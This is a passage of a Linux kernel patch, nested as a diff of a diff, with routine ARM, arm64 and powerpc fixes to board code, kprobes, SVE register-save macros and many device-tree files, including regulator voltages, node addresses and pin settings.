+--- a/arch/arm/mach-omap2/board-generic.c
++++ b/arch/arm/mach-omap2/board-generic.c
+@@ -13,6 +13,7 @@
+ #include <linux/of_platform.h>
+ #include <linux/irqdomain.h>
+ #include <linux/clocksource.h>
++#include <linux/clockchips.h>
+ 
+ #include <asm/setup.h>
+ #include <asm/mach/arch.h>
+diff --git a/arch/arm/mach-orion5x/board-dt.c b/arch/arm/mach-orion5x/board-dt.c
+index e3736ffc83477..be47492c6640d 100644
+--- a/arch/arm/mach-orion5x/board-dt.c
++++ b/arch/arm/mach-orion5x/board-dt.c
+@@ -60,6 +60,9 @@ static void __init orion5x_dt_init(void)
+ 	if (of_machine_is_compatible("maxtor,shared-storage-2"))
+ 		mss2_init();
+ 
++	if (of_machine_is_compatible("lacie,d2-network"))
++		d2net_init();
++
+ 	of_platform_default_populate(NULL, orion5x_auxdata_lookup, NULL);
+ }
+ 
+diff --git a/arch/arm/mach-orion5x/common.h b/arch/arm/mach-orion5x/common.h
+index eb96009e21c4c..b9cfdb4564568 100644
+--- a/arch/arm/mach-orion5x/common.h
++++ b/arch/arm/mach-orion5x/common.h
+@@ -75,6 +75,12 @@ extern void mss2_init(void);
+ static inline void mss2_init(void) {}
+ #endif
+ 
++#ifdef CONFIG_MACH_D2NET_DT
++void d2net_init(void);
++#else
++static inline void d2net_init(void) {}
++#endif
++
+ /*****************************************************************************
+  * Helpers to access Orion registers
+  ****************************************************************************/
+diff --git a/arch/arm/probes/kprobes/checkers-common.c b/arch/arm/probes/kprobes/checkers-common.c
+index 4d720990cf2a3..eba7ac4725c02 100644
+--- a/arch/arm/probes/kprobes/checkers-common.c
++++ b/arch/arm/probes/kprobes/checkers-common.c
+@@ -40,7 +40,7 @@ enum probes_insn checker_stack_use_imm_0xx(probes_opcode_t insn,
+  * Different from other insn uses imm8, the real addressing offset of
+  * STRD in T32 encoding should be imm8 * 4. See ARMARM description.
+  */
+-enum probes_insn checker_stack_use_t32strd(probes_opcode_t insn,
++static enum probes_insn checker_stack_use_t32strd(probes_opcode_t insn,
+ 		struct arch_probes_insn *asi,
+ 		const struct decode_header *h)
+ {
+diff --git a/arch/arm/probes/kprobes/core.c b/arch/arm/probes/kprobes/core.c
+index 9090c3a74dcce..d8238da095df7 100644
+--- a/arch/arm/probes/kprobes/core.c
++++ b/arch/arm/probes/kprobes/core.c
+@@ -233,7 +233,7 @@ singlestep(struct kprobe *p, struct pt_regs *regs, struct kprobe_ctlblk *kcb)
+  * kprobe, and that level is reserved for user kprobe handlers, so we can't
+  * risk encountering a new kprobe in an interrupt handler.
+  */
+-void __kprobes kprobe_handler(struct pt_regs *regs)
++static void __kprobes kprobe_handler(struct pt_regs *regs)
+ {
+ 	struct kprobe *p, *cur;
+ 	struct kprobe_ctlblk *kcb;
+diff --git a/arch/arm/probes/kprobes/opt-arm.c b/arch/arm/probes/kprobes/opt-arm.c
+index dbef34ed933f2..7f65048380ca5 100644
+--- a/arch/arm/probes/kprobes/opt-arm.c
++++ b/arch/arm/probes/kprobes/opt-arm.c
+@@ -145,8 +145,6 @@ __arch_remove_optimized_kprobe(struct optimized_kprobe *op, int dirty)
+ 	}
+ }
+ 
+-extern void kprobe_handler(struct pt_regs *regs);
+-
+ static void
+ optimized_callback(struct optimized_kprobe *op, struct pt_regs *regs)
+ {
+diff --git a/arch/arm/probes/kprobes/test-core.c b/arch/arm/probes/kprobes/test-core.c
+index c562832b86272..171c7076b89f4 100644
+--- a/arch/arm/probes/kprobes/test-core.c
++++ b/arch/arm/probes/kprobes/test-core.c
+@@ -720,7 +720,7 @@ static const char coverage_register_lookup[16] = {
+ 	[REG_TYPE_NOSPPCX]	= COVERAGE_ANY_REG | COVERAGE_SP,
+ };
+ 
+-unsigned coverage_start_registers(const struct decode_header *h)
++static unsigned coverage_start_registers(const struct decode_header *h)
+ {
+ 	unsigned regs = 0;
+ 	int i;
+diff --git a/arch/arm/probes/kprobes/test-core.h b/arch/arm/probes/kprobes/test-core.h
+index 56ad3c0aaeeac..c7297037c1623 100644
+--- a/arch/arm/probes/kprobes/test-core.h
++++ b/arch/arm/probes/kprobes/test-core.h
+@@ -454,3 +454,7 @@ void kprobe_thumb32_test_cases(void);
+ #else
+ void kprobe_arm_test_cases(void);
+ #endif
++
++void __kprobes_test_case_start(void);
++void __kprobes_test_case_end_16(void);
++void __kprobes_test_case_end_32(void);
+diff --git a/arch/arm64/boot/dts/mediatek/mt8183-kukui.dtsi b/arch/arm64/boot/dts/mediatek/mt8183-kukui.dtsi
+index b4b86bb1f1a7d..632fd89e75969 100644
+--- a/arch/arm64/boot/dts/mediatek/mt8183-kukui.dtsi
++++ b/arch/arm64/boot/dts/mediatek/mt8183-kukui.dtsi
+@@ -297,6 +297,10 @@
+ 	};
+ };
+ 
++&gic {
++	mediatek,broken-save-restore-fw;
++};
++
+ &gpu {
+ 	mali-supply = <&mt6358_vgpu_reg>;
+ 	sram-supply = <&mt6358_vsram_gpu_reg>;
+diff --git a/arch/arm64/boot/dts/mediatek/mt8192.dtsi b/arch/arm64/boot/dts/mediatek/mt8192.dtsi
+index ef1294d960145..2f40c6cc407c1 100644
+--- a/arch/arm64/boot/dts/mediatek/mt8192.dtsi
++++ b/arch/arm64/boot/dts/mediatek/mt8192.dtsi
+@@ -64,7 +64,8 @@
+ 			clock-frequency = <1701000000>;
+ 			cpu-idle-states = <&cpu_sleep_l &cluster_sleep_l>;
+ 			next-level-cache = <&l2_0>;
+-			capacity-dmips-mhz = <530>;
++			performance-domains = <&performance 0>;
++			capacity-dmips-mhz = <427>;
+ 		};
+ 
+ 		cpu1: cpu@100 {
+@@ -75,7 +76,8 @@
+ 			clock-frequency = <1701000000>;
+ 			cpu-idle-states = <&cpu_sleep_l &cluster_sleep_l>;
+ 			next-level-cache = <&l2_0>;
+-			capacity-dmips-mhz = <530>;
++			performance-domains = <&performance 0>;
++			capacity-dmips-mhz = <427>;
+ 		};
+ 
+ 		cpu2: cpu@200 {
+@@ -86,7 +88,8 @@
+ 			clock-frequency = <1701000000>;
+ 			cpu-idle-states = <&cpu_sleep_l &cluster_sleep_l>;
+ 			next-level-cache = <&l2_0>;
+-			capacity-dmips-mhz = <530>;
++			performance-domains = <&performance 0>;
++			capacity-dmips-mhz = <427>;
+ 		};
+ 
+ 		cpu3: cpu@300 {
+@@ -97,7 +100,8 @@
+ 			clock-frequency = <1701000000>;
+ 			cpu-idle-states = <&cpu_sleep_l &cluster_sleep_l>;
+ 			next-level-cache = <&l2_0>;
+-			capacity-dmips-mhz = <530>;
++			performance-domains = <&performance 0>;
++			capacity-dmips-mhz = <427>;
+ 		};
+ 
+ 		cpu4: cpu@400 {
+@@ -108,6 +112,7 @@
+ 			clock-frequency = <2171000000>;
+ 			cpu-idle-states = <&cpu_sleep_b &cluster_sleep_b>;
+ 			next-level-cache = <&l2_1>;
++			performance-domains = <&performance 1>;
+ 			capacity-dmips-mhz = <1024>;
+ 		};
+ 
+@@ -119,6 +124,7 @@
+ 			clock-frequency = <2171000000>;
+ 			cpu-idle-states = <&cpu_sleep_b &cluster_sleep_b>;
+ 			next-level-cache = <&l2_1>;
++			performance-domains = <&performance 1>;
+ 			capacity-dmips-mhz = <1024>;
+ 		};
+ 
+@@ -130,6 +136,7 @@
+ 			clock-frequency = <2171000000>;
+ 			cpu-idle-states = <&cpu_sleep_b &cluster_sleep_b>;
+ 			next-level-cache = <&l2_1>;
++			performance-domains = <&performance 1>;
+ 			capacity-dmips-mhz = <1024>;
+ 		};
+ 
+@@ -141,6 +148,7 @@
+ 			clock-frequency = <2171000000>;
+ 			cpu-idle-states = <&cpu_sleep_b &cluster_sleep_b>;
+ 			next-level-cache = <&l2_1>;
++			performance-domains = <&performance 1>;
+ 			capacity-dmips-mhz = <1024>;
+ 		};
+ 
+@@ -257,6 +265,12 @@
+ 		compatible = "simple-bus";
+ 		ranges;
+ 
++		performance: performance-controller@11bc10 {
++			compatible = "mediatek,cpufreq-hw";
++			reg = <0 0x0011bc10 0 0x120>, <0 0x0011bd30 0 0x120>;
++			#performance-domain-cells = <1>;
++		};
++
+ 		gic: interrupt-controller@c000000 {
+ 			compatible = "arm,gic-v3";
+ 			#interrupt-cells = <4>;
+diff --git a/arch/arm64/boot/dts/microchip/sparx5.dtsi b/arch/arm64/boot/dts/microchip/sparx5.dtsi
+index 2dd5e38820b16..088d89801c276 100644
+--- a/arch/arm64/boot/dts/microchip/sparx5.dtsi
++++ b/arch/arm64/boot/dts/microchip/sparx5.dtsi
+@@ -61,7 +61,7 @@
+ 		interrupt-affinity = <&cpu0>, <&cpu1>;
+ 	};
+ 
+-	psci {
++	psci: psci {
+ 		compatible = "arm,psci-0.2";
+ 		method = "smc";
+ 	};
+diff --git a/arch/arm64/boot/dts/microchip/sparx5_pcb_common.dtsi b/arch/arm64/boot/dts/microchip/sparx5_pcb_common.dtsi
+index 9d1a082de3e29..32bb76b3202a0 100644
+--- a/arch/arm64/boot/dts/microchip/sparx5_pcb_common.dtsi
++++ b/arch/arm64/boot/dts/microchip/sparx5_pcb_common.dtsi
+@@ -6,6 +6,18 @@
+ /dts-v1/;
+ #include "sparx5.dtsi"
+ 
++&psci {
++	status = "disabled";
++};
++
++&cpu0 {
++	enable-method = "spin-table";
++};
++
++&cpu1 {
++	enable-method = "spin-table";
++};
++
+ &uart0 {
+ 	status = "okay";
+ };
+diff --git a/arch/arm64/boot/dts/qcom/apq8016-sbc.dts b/arch/arm64/boot/dts/qcom/apq8016-sbc.dts
+index 1b613098fb4a0..e3e90ad92cc59 100644
+--- a/arch/arm64/boot/dts/qcom/apq8016-sbc.dts
++++ b/arch/arm64/boot/dts/qcom/apq8016-sbc.dts
+@@ -448,21 +448,21 @@
+ 	vdd_l7-supply = <&pm8916_s4>;
+ 
+ 	s3 {
+-		regulator-min-microvolt = <375000>;
+-		regulator-max-microvolt = <1562000>;
++		regulator-min-microvolt = <1250000>;
++		regulator-max-microvolt = <1350000>;
+ 	};
+ 
+ 	s4 {
+-		regulator-min-microvolt = <1800000>;
+-		regulator-max-microvolt = <1800000>;
++		regulator-min-microvolt = <1850000>;
++		regulator-max-microvolt = <2150000>;
+ 
+ 		regulator-always-on;
+ 		regulator-boot-on;
+ 	};
+ 
+ 	l1 {
+-		regulator-min-microvolt = <375000>;
+-		regulator-max-microvolt = <1525000>;
++		regulator-min-microvolt = <1225000>;
++		regulator-max-microvolt = <1225000>;
+ 	};
+ 
+ 	l2 {
+@@ -471,13 +471,13 @@
+ 	};
+ 
+ 	l4 {
+-		regulator-min-microvolt = <1750000>;
+-		regulator-max-microvolt = <3337000>;
++		regulator-min-microvolt = <2050000>;
++		regulator-max-microvolt = <2050000>;
+ 	};
+ 
+ 	l5 {
+-		regulator-min-microvolt = <1750000>;
+-		regulator-max-microvolt = <3337000>;
++		regulator-min-microvolt = <1800000>;
++		regulator-max-microvolt = <1800000>;
+ 	};
+ 
+ 	l6 {
+@@ -486,60 +486,68 @@
+ 	};
+ 
+ 	l7 {
+-		regulator-min-microvolt = <1750000>;
+-		regulator-max-microvolt = <3337000>;
++		regulator-min-microvolt = <1800000>;
++		regulator-max-microvolt = <1800000>;
+ 	};
+ 
+ 	l8 {
+-		regulator-min-microvolt = <1750000>;
+-		regulator-max-microvolt = <3337000>;
++		regulator-min-microvolt = <2900000>;
++		regulator-max-microvolt = <2900000>;
+ 	};
+ 
+ 	l9 {
+-		regulator-min-microvolt = <1750000>;
+-		regulator-max-microvolt = <3337000>;
++		regulator-min-microvolt = <3300000>;
++		regulator-max-microvolt = <3300000>;
+ 	};
+ 
+ 	l10 {
+-		regulator-min-microvolt = <1750000>;
+-		regulator-max-microvolt = <3337000>;
++		regulator-min-microvolt = <2800000>;
++		regulator-max-microvolt = <2800000>;
+ 	};
+ 
+ 	l11 {
+-		regulator-min-microvolt = <1750000>;
+-		regulator-max-microvolt = <3337000>;
++		regulator-min-microvolt = <2950000>;
++		regulator-max-microvolt = <2950000>;
+ 		regulator-allow-set-load;
+ 		regulator-system-load = <200000>;
+ 	};
+ 
+ 	l12 {
+-		regulator-min-microvolt = <1750000>;
+-		regulator-max-microvolt = <3337000>;
++		regulator-min-microvolt = <1800000>;
++		regulator-max-microvolt = <2950000>;
+ 	};
+ 
+ 	l13 {
+-		regulator-min-microvolt = <1750000>;
+-		regulator-max-microvolt = <3337000>;
++		regulator-min-microvolt = <3075000>;
++		regulator-max-microvolt = <3075000>;
+ 	};
+ 
+ 	l14 {
+-		regulator-min-microvolt = <1750000>;
+-		regulator-max-microvolt = <3337000>;
++		regulator-min-microvolt = <1800000>;
++		regulator-max-microvolt = <3300000>;
+ 	};
+ 
+-	/**
+-	 * 1.8v required on LS expansion
+-	 * for mezzanine boards
++	/*
++	 * The 96Boards specification expects a 1.8V power rail on the low-speed
++	 * expansion connector that is able to provide at least 0.18W / 100 mA.
++	 * L15/L16 are connected in parallel to provide 55 mA each. A minimum load
++	 * must be specified to ensure the regulators are not put in LPM where they
++	 * would only provide 5 mA.
+ 	 */
+ 	l15 {
+-		regulator-min-microvolt = <1750000>;
+-		regulator-max-microvolt = <3337000>;
++		regulator-min-microvolt = <1800000>;
++		regulator-max-microvolt = <1800000>;
++		regulator-system-load = <50000>;
++		regulator-allow-set-load;
+ 		regulator-always-on;
+ 	};
+ 
+ 	l16 {
+-		regulator-min-microvolt = <1750000>;
+-		regulator-max-microvolt = <3337000>;
++		regulator-min-microvolt = <1800000>;
++		regulator-max-microvolt = <1800000>;
++		regulator-system-load = <50000>;
++		regulator-allow-set-load;
++		regulator-always-on;
+ 	};
+ 
+ 	l17 {
+@@ -548,8 +556,8 @@
+ 	};
+ 
+ 	l18 {
+-		regulator-min-microvolt = <1750000>;
+-		regulator-max-microvolt = <3337000>;
++		regulator-min-microvolt = <2700000>;
++		regulator-max-microvolt = <2700000>;
+ 	};
+ };
+ 
+diff --git a/arch/arm64/boot/dts/qcom/apq8096-ifc6640.dts b/arch/arm64/boot/dts/qcom/apq8096-ifc6640.dts
+index 92f264891d84b..9b20c1a47a186 100644
+--- a/arch/arm64/boot/dts/qcom/apq8096-ifc6640.dts
++++ b/arch/arm64/boot/dts/qcom/apq8096-ifc6640.dts
+@@ -26,7 +26,7 @@
+ 
+ 	v1p05: v1p05-regulator {
+ 		compatible = "regulator-fixed";
+-		reglator-name = "v1p05";
++		regulator-name = "v1p05";
+ 		regulator-always-on;
+ 		regulator-boot-on;
+ 
+@@ -38,7 +38,7 @@
+ 
+ 	v12_poe: v12-poe-regulator {
+ 		compatible = "regulator-fixed";
+-		reglator-name = "v12_poe";
++		regulator-name = "v12_poe";
+ 		regulator-always-on;
+ 		regulator-boot-on;
+ 
+diff --git a/arch/arm64/boot/dts/qcom/msm8916.dtsi b/arch/arm64/boot/dts/qcom/msm8916.dtsi
+index 9743cb270639d..f84b3c1a03c53 100644
+--- a/arch/arm64/boot/dts/qcom/msm8916.dtsi
++++ b/arch/arm64/boot/dts/qcom/msm8916.dtsi
+@@ -1088,7 +1088,7 @@
+ 			};
+ 		};
+ 
+-		camss: camss@1b00000 {
++		camss: camss@1b0ac00 {
+ 			compatible = "qcom,msm8916-camss";
+ 			reg = <0x01b0ac00 0x200>,
+ 				<0x01b00030 0x4>,
+@@ -1480,7 +1480,7 @@
+ 			#sound-dai-cells = <1>;
+ 		};
+ 
+-		sdhc_1: mmc@7824000 {
++		sdhc_1: mmc@7824900 {
+ 			compatible = "qcom,msm8916-sdhci", "qcom,sdhci-msm-v4";
+ 			reg = <0x07824900 0x11c>, <0x07824000 0x800>;
+ 			reg-names = "hc", "core";
+@@ -1498,7 +1498,7 @@
+ 			status = "disabled";
+ 		};
+ 
+-		sdhc_2: mmc@7864000 {
++		sdhc_2: mmc@7864900 {
+ 			compatible = "qcom,msm8916-sdhci", "qcom,sdhci-msm-v4";
+ 			reg = <0x07864900 0x11c>, <0x07864000 0x800>;
+ 			reg-names = "hc", "core";
+diff --git a/arch/arm64/boot/dts/qcom/msm8994.dtsi b/arch/arm64/boot/dts/qcom/msm8994.dtsi
+index 7ed59e698c14d..3c6c2cf99fb9d 100644
+--- a/arch/arm64/boot/dts/qcom/msm8994.dtsi
++++ b/arch/arm64/boot/dts/qcom/msm8994.dtsi
+@@ -746,7 +746,7 @@
+ 			reg = <0xfc4ab000 0x4>;
+ 		};
+ 
+-		spmi_bus: spmi@fc4c0000 {
++		spmi_bus: spmi@fc4cf000 {
+ 			compatible = "qcom,spmi-pmic-arb";
+ 			reg = <0xfc4cf000 0x1000>,
+ 			      <0xfc4cb000 0x1000>,
+diff --git a/arch/arm64/boot/dts/qcom/msm8996.dtsi b/arch/arm64/boot/dts/qcom/msm8996.dtsi
+index 9f89100542018..9d6ec59d1cd3a 100644
+--- a/arch/arm64/boot/dts/qcom/msm8996.dtsi
++++ b/arch/arm64/boot/dts/qcom/msm8996.dtsi
+@@ -2045,7 +2045,7 @@
+ 			};
+ 		};
+ 
+-		camss: camss@a00000 {
++		camss: camss@a34000 {
+ 			compatible = "qcom,msm8996-camss";
+ 			reg = <0x00a34000 0x1000>,
+ 			      <0x00a00030 0x4>,
+diff --git a/arch/arm64/boot/dts/qcom/pm7250b.dtsi b/arch/arm64/boot/dts/qcom/pm7250b.dtsi
+index 61f7a63451505..694fe912536e8 100644
+--- a/arch/arm64/boot/dts/qcom/pm7250b.dtsi
++++ b/arch/arm64/boot/dts/qcom/pm7250b.dtsi
+@@ -3,6 +3,7 @@
+  * Copyright (C) 2022 Luca Weiss <luca.weiss@fairphone.com>
+  */
+ 
++#include <dt-bindings/iio/qcom,spmi-vadc.h>
+ #include <dt-bindings/interrupt-controller/irq.h>
+ #include <dt-bindings/spmi/spmi.h>
+ 
+diff --git a/arch/arm64/boot/dts/qcom/sdm630.dtsi b/arch/arm64/boot/dts/qcom/sdm630.dtsi
+index e119060ac56cb..2430549265d3f 100644
+--- a/arch/arm64/boot/dts/qcom/sdm630.dtsi
++++ b/arch/arm64/boot/dts/qcom/sdm630.dtsi
+@@ -1902,7 +1902,7 @@
+ 			};
+ 		};
+ 
+-		camss: camss@ca00000 {
++		camss: camss@ca00020 {
+ 			compatible = "qcom,sdm660-camss";
+ 			reg = <0x0ca00020 0x10>,
+ 			      <0x0ca30000 0x100>,
+diff --git a/arch/arm64/boot/dts/qcom/sdm845-xiaomi-polaris.dts b/arch/arm64/boot/dts/qcom/sdm845-xiaomi-polaris.dts
+index 74c6832e05985..093b04359ec39 100644
+--- a/arch/arm64/boot/dts/qcom/sdm845-xiaomi-polaris.dts
++++ b/arch/arm64/boot/dts/qcom/sdm845-xiaomi-polaris.dts
+@@ -484,6 +484,7 @@
+ 		};
+ 
+ 		rmi4-f12@12 {
++			reg = <0x12>;
+ 			syna,rezero-wait-ms = <0xc8>;
+ 			syna,clip-x-high = <0x438>;
+ 			syna,clip-y-high = <0x870>;
+diff --git a/arch/arm64/boot/dts/qcom/sdm845.dtsi b/arch/arm64/boot/dts/qcom/sdm845.dtsi
+index a99eda4971010..b7ba70857d0ad 100644
+--- a/arch/arm64/boot/dts/qcom/sdm845.dtsi
++++ b/arch/arm64/boot/dts/qcom/sdm845.dtsi
+@@ -4207,7 +4207,7 @@
+ 			#reset-cells = <1>;
+ 		};
+ 
+-		camss: camss@a00000 {
++		camss: camss@acb3000 {
+ 			compatible = "qcom,sdm845-camss";
+ 
+ 			reg = <0 0xacb3000 0 0x1000>,
+@@ -5043,6 +5043,7 @@
+ 					  <SLEEP_TCS   3>,
+ 					  <WAKE_TCS    3>,
+ 					  <CONTROL_TCS 1>;
++			power-domains = <&CLUSTER_PD>;
+ 
+ 			apps_bcm_voter: bcm-voter {
+ 				compatible = "qcom,bcm-voter";
+diff --git a/arch/arm64/boot/dts/qcom/sm8250-sony-xperia-edo.dtsi b/arch/arm64/boot/dts/qcom/sm8250-sony-xperia-edo.dtsi
+index e4769dcfaad7b..390b90a8ddf70 100644
+--- a/arch/arm64/boot/dts/qcom/sm8250-sony-xperia-edo.dtsi
++++ b/arch/arm64/boot/dts/qcom/sm8250-sony-xperia-edo.dtsi
+@@ -26,9 +26,10 @@
+ 		framebuffer: framebuffer@9c000000 {
+ 			compatible = "simple-framebuffer";
+ 			reg = <0 0x9c000000 0 0x2300000>;
+-			width = <1644>;
+-			height = <3840>;
+-			stride = <(1644 * 4)>;
++			/* pdx203 BL initializes in 2.5k mode, not 4k */
++			width = <1096>;
++			height = <2560>;
++			stride = <(1096 * 4)>;
+ 			format = "a8r8g8b8";
+ 			/*
+ 			 * That's a lot of clocks, but it's necessary due
+diff --git a/arch/arm64/boot/dts/qcom/sm8350.dtsi b/arch/arm64/boot/dts/qcom/sm8350.dtsi
+index ca7c428a741d4..7fd1c3f71c0f8 100644
+--- a/arch/arm64/boot/dts/qcom/sm8350.dtsi
++++ b/arch/arm64/boot/dts/qcom/sm8350.dtsi
+@@ -678,7 +678,7 @@
+ 		};
+ 
+ 		gpi_dma2: dma-controller@800000 {
+-			compatible = "qcom,sm8350-gpi-dma";
++			compatible = "qcom,sm8350-gpi-dma", "qcom,sm6350-gpi-dma";
+ 			reg = <0 0x00800000 0 0x60000>;
+ 			interrupts = <GIC_SPI 588 IRQ_TYPE_LEVEL_HIGH>,
+ 				     <GIC_SPI 589 IRQ_TYPE_LEVEL_HIGH>,
+@@ -903,8 +903,8 @@
+ 			};
+ 		};
+ 
+-		gpi_dma0: dma-controller@900000 {
+-			compatible = "qcom,sm8350-gpi-dma";
++		gpi_dma0: dma-controller@9800000 {
++			compatible = "qcom,sm8350-gpi-dma", "qcom,sm6350-gpi-dma";
+ 			reg = <0 0x09800000 0 0x60000>;
+ 			interrupts = <GIC_SPI 244 IRQ_TYPE_LEVEL_HIGH>,
+ 				     <GIC_SPI 245 IRQ_TYPE_LEVEL_HIGH>,
+@@ -1207,7 +1207,7 @@
+ 		};
+ 
+ 		gpi_dma1: dma-controller@a00000 {
+-			compatible = "qcom,sm8350-gpi-dma";
++			compatible = "qcom,sm8350-gpi-dma", "qcom,sm6350-gpi-dma";
+ 			reg = <0 0x00a00000 0 0x60000>;
+ 			interrupts = <GIC_SPI 279 IRQ_TYPE_LEVEL_HIGH>,
+ 				     <GIC_SPI 280 IRQ_TYPE_LEVEL_HIGH>,
+diff --git a/arch/arm64/boot/dts/renesas/ulcb-kf.dtsi b/arch/arm64/boot/dts/renesas/ulcb-kf.dtsi
+index 408871c2859d1..588b14b66b6fb 100644
+--- a/arch/arm64/boot/dts/renesas/ulcb-kf.dtsi
++++ b/arch/arm64/boot/dts/renesas/ulcb-kf.dtsi
+@@ -393,7 +393,7 @@
+ 	};
+ 
+ 	scif1_pins: scif1 {
+-		groups = "scif1_data_b", "scif1_ctrl";
++		groups = "scif1_data_b";
+ 		function = "scif1";
+ 	};
+ 
+@@ -447,7 +447,6 @@
+ &scif1 {
+ 	pinctrl-0 = <&scif1_pins>;
+ 	pinctrl-names = "default";
+-	uart-has-rtscts;
+ 
+ 	status = "okay";
+ };
+diff --git a/arch/arm64/boot/dts/ti/k3-j7200-common-proc-board.dts b/arch/arm64/boot/dts/ti/k3-j7200-common-proc-board.dts
+index 50009f963a324..5840063f61293 100644
+--- a/arch/arm64/boot/dts/ti/k3-j7200-common-proc-board.dts
++++ b/arch/arm64/boot/dts/ti/k3-j7200-common-proc-board.dts
+@@ -83,25 +83,25 @@
+ &wkup_pmx2 {
+ 	mcu_cpsw_pins_default: mcu-cpsw-pins-default {
+ 		pinctrl-single,pins = <
+-			J721E_WKUP_IOPAD(0x0068, PIN_OUTPUT, 0) /* MCU_RGMII1_TX_CTL */
+-			J721E_WKUP_IOPAD(0x006c, PIN_INPUT, 0) /* MCU_RGMII1_RX_CTL */
+-			J721E_WKUP_IOPAD(0x0070, PIN_OUTPUT, 0) /* MCU_RGMII1_TD3 */
+-			J721E_WKUP_IOPAD(0x0074, PIN_OUTPUT, 0) /* MCU_RGMII1_TD2 */
+-			J721E_WKUP_IOPAD(0x0078, PIN_OUTPUT, 0) /* MCU_RGMII1_TD1 */
+-			J721E_WKUP_IOPAD(0x007c, PIN_OUTPUT, 0) /* MCU_RGMII1_TD0 */
+-			J721E_WKUP_IOPAD(0x0088, PIN_INPUT, 0) /* MCU_RGMII1_RD3 */
+-			J721E_WKUP_IOPAD(0x008c, PIN_INPUT, 0) /* MCU_RGMII1_RD2 */
+-			J721E_WKUP_IOPAD(0x0090, PIN_INPUT, 0) /* MCU_RGMII1_RD1 */
+-			J721E_WKUP_IOPAD(0x0094, PIN_INPUT, 0) /* MCU_RGMII1_RD0 */
+-			J721E_WKUP_IOPAD(0x0080, PIN_OUTPUT, 0) /* MCU_RGMII1_TXC */
+-			J721E_WKUP_IOPAD(0x0084, PIN_INPUT, 0) /* MCU_RGMII1_RXC */
++			J721E_WKUP_IOPAD(0x0000, PIN_OUTPUT, 0) /* MCU_RGMII1_TX_CTL */
++			J721E_WKUP_IOPAD(0x0004, PIN_INPUT, 0) /* MCU_RGMII1_RX_CTL */
++			J721E_WKUP_IOPAD(0x0008, PIN_OUTPUT, 0) /* MCU_RGMII1_TD3 */
++			J721E_WKUP_IOPAD(0x000c, PIN_OUTPUT, 0) /* MCU_RGMII1_TD2 */
++			J721E_WKUP_IOPAD(0x0010, PIN_OUTPUT, 0) /* MCU_RGMII1_TD1 */
++			J721E_WKUP_IOPAD(0x0014, PIN_OUTPUT, 0) /* MCU_RGMII1_TD0 */
++			J721E_WKUP_IOPAD(0x0020, PIN_INPUT, 0) /* MCU_RGMII1_RD3 */
++			J721E_WKUP_IOPAD(0x0024, PIN_INPUT, 0) /* MCU_RGMII1_RD2 */
++			J721E_WKUP_IOPAD(0x0028, PIN_INPUT, 0) /* MCU_RGMII1_RD1 */
++			J721E_WKUP_IOPAD(0x002c, PIN_INPUT, 0) /* MCU_RGMII1_RD0 */
++			J721E_WKUP_IOPAD(0x0018, PIN_OUTPUT, 0) /* MCU_RGMII1_TXC */
++			J721E_WKUP_IOPAD(0x001c, PIN_INPUT, 0) /* MCU_RGMII1_RXC */
+ 		>;
+ 	};
+ 
+ 	mcu_mdio_pins_default: mcu-mdio1-pins-default {
+ 		pinctrl-single,pins = <
+-			J721E_WKUP_IOPAD(0x009c, PIN_OUTPUT, 0) /* (L1) MCU_MDIO0_MDC */
+-			J721E_WKUP_IOPAD(0x0098, PIN_INPUT, 0) /* (L4) MCU_MDIO0_MDIO */
++			J721E_WKUP_IOPAD(0x0034, PIN_OUTPUT, 0) /* (L1) MCU_MDIO0_MDC */
++			J721E_WKUP_IOPAD(0x0030, PIN_INPUT, 0) /* (L4) MCU_MDIO0_MDIO */
+ 		>;
+ 	};
+ };
+diff --git a/arch/arm64/include/asm/fpsimdmacros.h b/arch/arm64/include/asm/fpsimdmacros.h
+index 5e0910cf48321..696d247cf8fb0 100644
+--- a/arch/arm64/include/asm/fpsimdmacros.h
++++ b/arch/arm64/include/asm/fpsimdmacros.h
+@@ -294,12 +294,12 @@
+  _for n, 0, 15,	_sve_str_p	\n, \nxbase, \n - 16
+ 		cbz		\save_ffr, 921f
+ 		_sve_rdffr	0
+-		_sve_str_p	0, \nxbase
+-		_sve_ldr_p	0, \nxbase, -16
+ 		b		922f
+ 921:
+-		str		xzr, [x\nxbase]		// Zero out FFR
++		_sve_pfalse	0			// Zero out FFR
+ 922:
++		_sve_str_p	0, \nxbase
++		_sve_ldr_p	0, \nxbase, -16
+ 		mrs		x\nxtmp, fpsr
+ 		str		w\nxtmp, [\xpfpsr]
+ 		mrs		x\nxtmp, fpcr
+diff --git a/arch/powerpc/Kconfig.debug b/arch/powerpc/Kconfig.debug
+index 6aaf8dc60610d..2a54fadbeaf51 100644
+--- a/arch/powerpc/Kconfig.debug
++++ b/arch/powerpc/Kconfig.debug
+@@ -240,7 +240,7 @@ config PPC_EARLY_DEBUG_40x
+ 
+ config PPC_EARLY_DEBUG_CPM
+ 	bool "Early serial debugging for Freescale CPM-based serial ports"
+-	depends on SERIAL_CPM
++	depends on SERIAL_CPM=y
+ 	help
+ 	  Select this to enable early debugging for Freescale chips
+ 	  using a CPM-based serial port.  This assumes that the bootwrapper
+diff --git a/arch/powerpc/boot/dts/turris1x.dts b/arch/powerpc/boot/dts/turris1x.dts
+index e9cda34a140e0..9377055d5565c 100644
+--- a/arch/powerpc/boot/dts/turris1x.dts
++++ b/arch/powerpc/boot/dts/turris1x.dts
+@@ -453,12 +453,12 @@
+ 		 * channel 1 (but only USB 2.0 subset) to USB 2.0 pins on mPCIe
+ 		 * slot 1 (CN5), channels 2 and 3 to connector P600.
+ 		 *
+-		 * P2020 PCIe Root Port uses 1MB of PCIe MEM and xHCI controller
++		 * P2020 PCIe Root Port does not use PCIe MEM and xHCI controller
+ 		 * uses 64kB + 8kB of PCIe MEM. No PCIe IO is used or required.
+-		 * So allocate 2MB of PCIe MEM for this PCIe bus.
++		 * So allocate 128kB of PCIe MEM for this PCIe bus.
+ 		 */
+ 		reg = <0 0xffe08000 0 0x1000>;
+-		ranges = <0x02000000 0x0 0xc0000000 0 0xc0000000 0x0 0x00200000>, /* MEM */
++		ranges = <0x02000000 0x0 0xc0000000 0 0xc0000000 0x0 0x00020000>, /* MEM */
+ 			 <0x01000000 0x0 0x00000000 0 0xffc20000 0x0 0x00010000>; /* IO */
+ 
+ 		pcie@0 {
+diff --git a/arch/powerpc/kernel/interrupt.c b/arch/powerpc/kernel/interrupt.c
+index 0ec1581619db5..cf770d86c03c6 100644
+--- a/arch/powerpc/kernel/interrupt.c
++++ b/arch/powerpc/kernel/interrupt.c
+@@ -368,7 +368,6 @@ void preempt_schedule_irq(void);
+ 
+ notrace unsigned long interrupt_exit_kernel_prepare(struct pt_regs *regs)
+ {
+-	unsigned long flags;
+ 	unsigned long ret = 0;
